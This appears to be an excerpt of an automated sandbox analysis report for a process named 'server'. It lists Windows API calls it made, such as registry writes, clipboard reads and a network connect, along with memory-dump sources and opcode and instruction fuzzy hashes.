              • Opcode Fuzzy Hash: baab47cd19a4a22d4430d6171b77a9d5e6ef00cd2f3e30a1fc166a62dea08c2d
              • Instruction Fuzzy Hash: CF118E76600704AFEB21CF15DC85FA6FBECEF04714F08846AE945CBA61D764E408CAB6
              APIs
              • SetFileAttributesW.KERNELBASE(?,?), ref: 00D9B9BF
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 65fc7d9fc69f0134cb35645ca98786e2b82addc164fe1d5d5b78da03d135d871
              • Instruction ID: e6ee3f7d277f0c54cad29b749438a016d8fdc3380679eed1fc74fd25059e5a1d
              • Opcode Fuzzy Hash: 65fc7d9fc69f0134cb35645ca98786e2b82addc164fe1d5d5b78da03d135d871
              • Instruction Fuzzy Hash: EA2193715093809FDB128F25DC85B56BFA8EF02320F0984DBD985CF263D2659909CB71
              APIs
              • RegSetValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B3E4
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Value
              • String ID:
              • API String ID: 3702945584-0
              • Opcode ID: 002ea834693e306f9deb89c906076c19add6f38dd7e3d877d13ce19a875b828a
              • Instruction ID: 6b566c04b4d86467ebe28b0377260470548ec17a2d55f779a4ba08956e39ed8d
              • Opcode Fuzzy Hash: 002ea834693e306f9deb89c906076c19add6f38dd7e3d877d13ce19a875b828a
              • Instruction Fuzzy Hash: E4118E76600600AFEB21CF11DD81FA7BBACEF14724F08855AED459B652D364E8089AB6
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 6cf62dc5ee17650ca730418522704c755d0ce37a34a18e9363e6f6a479001fed
              • Instruction ID: 13a21b05bde9ee828e478c813f506821005c63fb2c06a948ed783050c20bf78b
              • Opcode Fuzzy Hash: 6cf62dc5ee17650ca730418522704c755d0ce37a34a18e9363e6f6a479001fed
              • Instruction Fuzzy Hash: 2A21277140D3C05FDB128B25DC95A52BFB4EF07224F0E84DBD9859F1A3D2699908D7B2
              APIs
              • GetProcessTimes.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1B0D
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: ProcessTimes
              • String ID:
              • API String ID: 1995159646-0
              • Opcode ID: c5462648fb1475f552f39494db581329aa169fb7ea944ee5cf02cdf042da53f2
              • Instruction ID: 7a4970c74a50d16993d310f46fd8b28ffbe1727de92fb29c6bbdffd6bb5780ad
              • Opcode Fuzzy Hash: c5462648fb1475f552f39494db581329aa169fb7ea944ee5cf02cdf042da53f2
              • Instruction Fuzzy Hash: B211D372500600AFEB21CF55DC85FA6FBECEF04324F08C46AE9498B651E374A4188BB1
              APIs
              • GetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1FF3
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: ProcessSizeWorking
              • String ID:
              • API String ID: 3584180929-0
              • Opcode ID: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
              • Instruction ID: e7305a0e38cdd6d4b3c10f9b059241ebbc5a8618b707217b9a8e3412cf3f7d81
              • Opcode Fuzzy Hash: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
              • Instruction Fuzzy Hash: 8D11E276500600AFEB21CF15CC85FAAB7ACEF00324F0888ABE9058B651D774A918DBB1
              APIs
              • SetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA20D7
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: ProcessSizeWorking
              • String ID:
              • API String ID: 3584180929-0
              • Opcode ID: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
              • Instruction ID: d5946a48b33d1475f046239278a01f05a6f39c23e768fa75ef5652db170dae29
              • Opcode Fuzzy Hash: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
              • Instruction Fuzzy Hash: C811E272500600AFEB11CF14CC85BA6BBACEF00324F08886AED058B651D774A4189AB2
              APIs
              • GetExitCodeProcess.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1F14
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: CodeExitProcess
              • String ID:
              • API String ID: 3861947596-0
              • Opcode ID: 7ca84ce2c759a89ac03df8bc395088eb34f80e3ae53a34fa65aedee3b6f5b6e2
              • Instruction ID: 07eca6b6010c322cc320924c1c352601520dc8dba9a69c605e513133c4d47571
              • Opcode Fuzzy Hash: 7ca84ce2c759a89ac03df8bc395088eb34f80e3ae53a34fa65aedee3b6f5b6e2
              • Instruction Fuzzy Hash: E611C476600640AFEB11CF15DC85BAAB7ACDF00224F0884ABED09CB652D764A5088BB1
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D9A5DE
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 0aa3a453e6e9d917b8eba87274af8d9751639866684b59229b156b4ff7d81b06
              • Instruction ID: 79aa415a2977b9f5706d928bbb969dc6488de865abf6dc0552f5f5a1a5eae0ef
              • Opcode Fuzzy Hash: 0aa3a453e6e9d917b8eba87274af8d9751639866684b59229b156b4ff7d81b06
              • Instruction Fuzzy Hash: CD117572409780AFDB228F55DC44B62FFB4EF46310F0888DAED858B562C275A419DB61
              APIs
              • ReadFile.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9AE4D
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 93f56315a188e7e598337687225ed52d1d7f06b4bb862b6b89e8a3711537198a
              • Instruction ID: b916c854d8b8e9f0403ac7c75269ddcc8a4e489f04a8d75800f8b3f9cdbbd292
              • Opcode Fuzzy Hash: 93f56315a188e7e598337687225ed52d1d7f06b4bb862b6b89e8a3711537198a
              • Instruction Fuzzy Hash: 7C11C172500300AFEB21CF55DC85FA6FBACEF04324F08885AF9499B661D375A4099BB6
              APIs
              • CopyFileW.KERNELBASE(?,?,?), ref: 00D9B78E
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: CopyFile
              • String ID:
              • API String ID: 1304948518-0
              • Opcode ID: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
              • Instruction ID: 5c0f0ed817d07dad314bd35d64c1ed752752dda01338cee51c4e723d1149f68c
              • Opcode Fuzzy Hash: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
              • Instruction Fuzzy Hash: C01170755003409FEB50CF65E985B56BBD8EF55720F08C5AADC49CB651D374E804CA71
              APIs
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D9BB4E
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
              • Instruction ID: a6a19f1ed47946a7b578e79f215376bddf29850769a60231aabd9901a3f0ef83
              • Opcode Fuzzy Hash: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
              • Instruction Fuzzy Hash: 87117C766002049FEF10CF29ED85B56FBE8EB04328F09C4AADD49CB696D334E804CA71
              APIs
              • GetFileType.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9ACBD
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: f696d23ba2996fcf2e66a90a9095f3a390446b840cf54d5db42b5fa3c0fa19a3
              • Instruction ID: b51be73d81678fd28d07d5adbce386e4785db7258aa6451368c29c9d7e07dd07
              • Opcode Fuzzy Hash: f696d23ba2996fcf2e66a90a9095f3a390446b840cf54d5db42b5fa3c0fa19a3
              • Instruction Fuzzy Hash: 8F01C476500200AFEB10CF05DC85BA6B7ACDF44724F18C496ED058F751D364E8488AB6
              APIs
              • DispatchMessageA.USER32(?), ref: 03AA0A04
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: f4e2b4277560940d450a6b5e375ccc4df4d0e619a8ecb436c0cce86e76b1345c
              • Instruction ID: ad5cc652073d45d56e2ba5280f0d4d25353be14094ce93348ed3f3e8de2e1b1f
              • Opcode Fuzzy Hash: f4e2b4277560940d450a6b5e375ccc4df4d0e619a8ecb436c0cce86e76b1345c
              • Instruction Fuzzy Hash: A4116575409384AFDB12CF15DC44B62BFB8DF46624F0880DAED858B663D265A908C772
              APIs
              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 03AA1CCA
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: Connect
              • String ID:
              • API String ID: 3144859779-0
              • Opcode ID: b29ad6281c4d83dfb5cc1cfcd6081d0893921dcca46bad0906b082a6ac7360fe
              • Instruction ID: ebf779cad4da6cbf55db29e46c7c163ec00a44e71073e4cb589d9d57a6824e09
              • Opcode Fuzzy Hash: b29ad6281c4d83dfb5cc1cfcd6081d0893921dcca46bad0906b082a6ac7360fe
              • Instruction Fuzzy Hash: 1E117C76500740AFDB21CF59D885B52FBE4FF04314F08C9AAED498B662D335E419DB61
              APIs
              • K32EnumProcesses.KERNEL32(?,?,?,DFA40B92,00000000,?,?,?,?,?,?,?,?,6CD53C58), ref: 00D9BE42
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: EnumProcesses
              • String ID:
              • API String ID: 84517404-0
              • Opcode ID: ac4a4c2fd8ac7657886e5faecf4cf43ccca850b5c2d92261565f4bb0cb037d1f
              • Instruction ID: 6663ddb04c95705f530cce3117aa2310bb2e671d9d265131d223cb1448fa21cc
              • Opcode Fuzzy Hash: ac4a4c2fd8ac7657886e5faecf4cf43ccca850b5c2d92261565f4bb0cb037d1f
              • Instruction Fuzzy Hash: 0B115E755002409FDB10CF55D985B96FBE8EF04324F08C4AAEE498B651D375E818DA71
              APIs
              • SetFileAttributesW.KERNELBASE(?,?), ref: 00D9B9BF
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b6f83c7787333adf626b1b2c50ceba17a95bf63fa1cfc16ee7d3ea2e94c9ea82
              • Instruction ID: c883bb609dd248bbf53662706aeb72de000eb51241e639d6f2eea57e514e09d7
              • Opcode Fuzzy Hash: b6f83c7787333adf626b1b2c50ceba17a95bf63fa1cfc16ee7d3ea2e94c9ea82
              • Instruction Fuzzy Hash: 2B016D75600240AFEB108F1AE985B66BB94EB04324F08C4AADD49CB652D375D8048E71
              APIs
              • FormatMessageW.KERNELBASE(?,00000E90,?,?), ref: 03AA1E66
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: FormatMessage
              • String ID:
              • API String ID: 1306739567-0
              • Opcode ID: 2497efaf9c9214ae1e52b22ab25138a02aa13dae9ee71b49d226fbbaefb2c010
              • Instruction ID: 9cb143e2eb60f0e591a498d7449d4765010d2177684c4ce8fbc55f82bfe707b1
              • Opcode Fuzzy Hash: 2497efaf9c9214ae1e52b22ab25138a02aa13dae9ee71b49d226fbbaefb2c010
              • Instruction Fuzzy Hash: 9801B171A00200AFD310DF16CC46B76FBA8FB84A20F14812AEC089BB41D731B516CBE6
              APIs
              • DeleteFileW.KERNELBASE(?), ref: 00D9B908
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 5941a66a5a46a20d39b0d767835636791ed9966561f97f28e69c707848cf89f9
              • Instruction ID: fb2dc453f62b224874baf3be4a60a4961d76513c674e2ed8557d1bb03dec4e6a
              • Opcode Fuzzy Hash: 5941a66a5a46a20d39b0d767835636791ed9966561f97f28e69c707848cf89f9
              • Instruction Fuzzy Hash: AF014C76A042409FEB10CF25E985766BB98EF04324F18C4AADE49CB652D775E8088A71
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D9A5DE
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: a29c06a73f94d7ec8c8df8071fa5d7a911e8dc0dd67e4ee7236e78f52a79114a
              • Instruction ID: 34bd3c359bd1577096ced53cb0cb9db2292ca4353a789bc39442037427c172b0
              • Opcode Fuzzy Hash: a29c06a73f94d7ec8c8df8071fa5d7a911e8dc0dd67e4ee7236e78f52a79114a
              • Instruction Fuzzy Hash: D2015B365007409FDF618F55D885B52FBA0EF08324F08C99AEE894A622C376E419DBA2
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E90,?,?), ref: 03AA0EA2
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: f1d58c3a253dfa09ed1d16a24235d63caa534ccba5b00b40e969f457a384ea01
              • Instruction ID: d6d92fe2771b23aa43d60e41f3c85c5f5ad5b251c3ce99ff3607538340e005e8
              • Opcode Fuzzy Hash: f1d58c3a253dfa09ed1d16a24235d63caa534ccba5b00b40e969f457a384ea01
              • Instruction Fuzzy Hash: C501A271600600AFD210DF16CC46B76FBA8FB88A24F14811AEC089BB41D771F516CBE6
              APIs
              • OleGetClipboard.OLE32(?,00000E90,?,?), ref: 00D9A77E
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Clipboard
              • String ID:
              • API String ID: 220874293-0
              • Opcode ID: 9ce8ed5859e2d0e300559d5aea9d019370fd6a3d531c122f0d144b01ddaab2de
              • Instruction ID: a1de22209ae6911a57a707a6d527e55bbab419091ad2e6ce3fcbc442a4b74c0c
              • Opcode Fuzzy Hash: 9ce8ed5859e2d0e300559d5aea9d019370fd6a3d531c122f0d144b01ddaab2de
              • Instruction Fuzzy Hash: 01018671600600AFD310DF16DC46B76FBA8FB88A24F14815AED089BB41D775F516CBE6
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 33e7aebc5ba07cd34f01990683147db42705cad5cdb687921780daf0e6f2d883
              • Instruction ID: fbae3d3e85d6cafb822ecfea63b9780a183ade00de3822851c1d20925d920329
              • Opcode Fuzzy Hash: 33e7aebc5ba07cd34f01990683147db42705cad5cdb687921780daf0e6f2d883
              • Instruction Fuzzy Hash: A901A2768006409FDF10DF19D885B55FBA4EF00324F0CC4AADD498F612D275E408CAB2
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll
              • API String ID: 0-343416306
              • Opcode ID: 406ad240d769f96ecea5f4f15c405c6862bd9903d119ac7726b38dcb7cf2403e
              • Instruction ID: f3ca93e9bbaebd29bee277f08952bf161fe58ea0ba21e66752d2480fefa0a70e
              • Opcode Fuzzy Hash: 406ad240d769f96ecea5f4f15c405c6862bd9903d119ac7726b38dcb7cf2403e
              • Instruction Fuzzy Hash: 2AA1DC32B403018BDB14AB79D854BADB3A7EB85398F284629D5129F3E4DF39DD05CB60
              APIs
              • DispatchMessageA.USER32(?), ref: 03AA0A04
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: 14a7d75a465d53eb1c021bc88f8dfc2c9e47eb09d6398f38137e9d0e1df23d8b
              • Instruction ID: 3dd8ade0814fb9ef05edd61e21ecf65fdd9140e9c440100872ff988736896629
              • Opcode Fuzzy Hash: 14a7d75a465d53eb1c021bc88f8dfc2c9e47eb09d6398f38137e9d0e1df23d8b
              • Instruction Fuzzy Hash: 92F0AF3A8047449FEB20CF19D885B61FBA4EF04324F4CC0EADD094B762D379A448CAA2
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 00D9AA44
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 8f24bcefb2804e5e5173c2a7dc7e8c71070320bcebaa7c813cf72f358139d2cb
              • Instruction ID: 73bd788ea032d7dd6d78aae0ce7407156a221723683ec37b2df14473406ec34f
              • Opcode Fuzzy Hash: 8f24bcefb2804e5e5173c2a7dc7e8c71070320bcebaa7c813cf72f358139d2cb
              • Instruction Fuzzy Hash: F4F0AF368002409FEF208F09D985B65FBA0EF04728F4CC09ADD494B752D379E908CEB2
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l
              • API String ID: 0-1656731533
              • Opcode ID: db45006d37b7090cefbaabce7f2b7d1938d1e9036da0c52d2650f2b35ff1e447
              • Instruction ID: 133bbb8761cd0e8de90b046ef705a027d1483e7873e21074a517fd187de038c9
              • Opcode Fuzzy Hash: db45006d37b7090cefbaabce7f2b7d1938d1e9036da0c52d2650f2b35ff1e447
              • Instruction Fuzzy Hash: 50914C70A412248FDB24DB34D860BADB7B6EF89348F5041E9D509AB3A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll
              • API String ID: 0-343416306
              • Opcode ID: 4ce52664c45b9191f8a2197ee524fb63263de99d5e23bcfc7aaafa9b6b2e6d2a
              • Instruction ID: 088538854101b4f6d208e07b4195bb470eaaacfa464307dca2bea188a0c648d5
              • Opcode Fuzzy Hash: 4ce52664c45b9191f8a2197ee524fb63263de99d5e23bcfc7aaafa9b6b2e6d2a
              • Instruction Fuzzy Hash: 8D814A31A012188FDB14DFB4C851BEDB7B2EF49308F4045AAD10AAB3A4DB799D85CF61
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll
              • API String ID: 0-343416306
              • Opcode ID: 9c2ce60544e908fd10a6fb3432c02c668ac77ffe6cf7e536d65159b90d231575
              • Instruction ID: 79f4fcb057ccbd060e2b60576ad65388a2024dd2d5efe9b3564bc1540a66dda4
              • Opcode Fuzzy Hash: 9c2ce60544e908fd10a6fb3432c02c668ac77ffe6cf7e536d65159b90d231575
              • Instruction Fuzzy Hash: 83412835A012188FDB14DBB5C855BECB7B2AB89308F4045AAD109AB764CB755E48CF62
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l
              • API String ID: 0-1656731533
              • Opcode ID: e8921ad37c919114338362412401df4ece4bacf11c6c3475a9cd72f291210990
              • Instruction ID: f61bf72ee78c7f3cc2c9d00833d07209ba91c17b0d516364c78f60640a0bdc18
              • Opcode Fuzzy Hash: e8921ad37c919114338362412401df4ece4bacf11c6c3475a9cd72f291210990
              • Instruction Fuzzy Hash: 7531C171B012019FDB04AB79D821BBE33ABEB88348F544029D505D7BA4DF3D9D1ACBA1
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62a45489efa924ed89398594c5d60295096b29ca76f23cf26d26695670a5c6e1
              • Instruction ID: fbbb324bfe586dd088ab6ed9f73f5b214a7d331159fff0a9947f1d58bb0e5591
              • Opcode Fuzzy Hash: 62a45489efa924ed89398594c5d60295096b29ca76f23cf26d26695670a5c6e1
              • Instruction Fuzzy Hash: 0BA1B174A01218CFDB25DF64D994BEDB7B6FB48308F1041A9D909AB360DB399E85CF40
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f6c9f8b7bcec7ca9bad266a7183b1c8a3249f7aefc33748f825b01c151a818fe
              • Instruction ID: 84c8d11628abf91eea50a00f527698c63065be00345b0a53f477930fd9694529
              • Opcode Fuzzy Hash: f6c9f8b7bcec7ca9bad266a7183b1c8a3249f7aefc33748f825b01c151a818fe
              • Instruction Fuzzy Hash: C341AD32A403018ADB15AF36D8157ADB2E7AB85398F1C8569D511EB2E0DF38DD46CB21
              Memory Dump Source
              • Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3970000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7cae09fcd886f17391e0d183ec90eb94f97b8827fbc62f66e6dd55c3bf1cd1f
              • Instruction ID: ce7883342c5e6e20776e5d2364a9b88afb015c3a454ca707c64ab287614ef7a4
              • Opcode Fuzzy Hash: f7cae09fcd886f17391e0d183ec90eb94f97b8827fbc62f66e6dd55c3bf1cd1f
              • Instruction Fuzzy Hash: 5F11D631604240DFD715CF14C980B56F7A9AB88708F28C9ACE9494B793C777D813CA91
              Memory Dump Source
              • Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3970000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 917d623f53e5fe8fb36c3776f7dc60667ba44280f4455006419ac040acdb9e91
              • Instruction ID: 226345a6890932cc49d22d8ef48eefcb08a7906cdf2abac9ca076dd6337c2c78
              • Opcode Fuzzy Hash: 917d623f53e5fe8fb36c3776f7dc60667ba44280f4455006419ac040acdb9e91
              • Instruction Fuzzy Hash: FB115E3554D2C5DFC702CB10C990B55BFB1AF46208F2C86EED4888B6A3C37B9816DB52
              Memory Dump Source
              • Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3970000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f95e91cabc98a0567a98b8ef947d59dd30625389976cb320ccfc92990b6a44f
              • Instruction ID: 102033e387c8255f2004c3c8af0cc4080f85a35766762957d5e612dd90f1597b
              • Opcode Fuzzy Hash: 2f95e91cabc98a0567a98b8ef947d59dd30625389976cb320ccfc92990b6a44f
              • Instruction Fuzzy Hash: 5D01D6B65083806FD7018F06DC40863FFB8EF86620749C49FEC4D8B612D225B808CBB1
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 30fec57804b747b67434820115ebebdb68acaf62cbd9a57e9e63b3227a9329bf
              • Instruction ID: 4fbdd20bfe2539255dc0016203d361fcd445fe170af4b769666727ab8f60476f
              • Opcode Fuzzy Hash: 30fec57804b747b67434820115ebebdb68acaf62cbd9a57e9e63b3227a9329bf
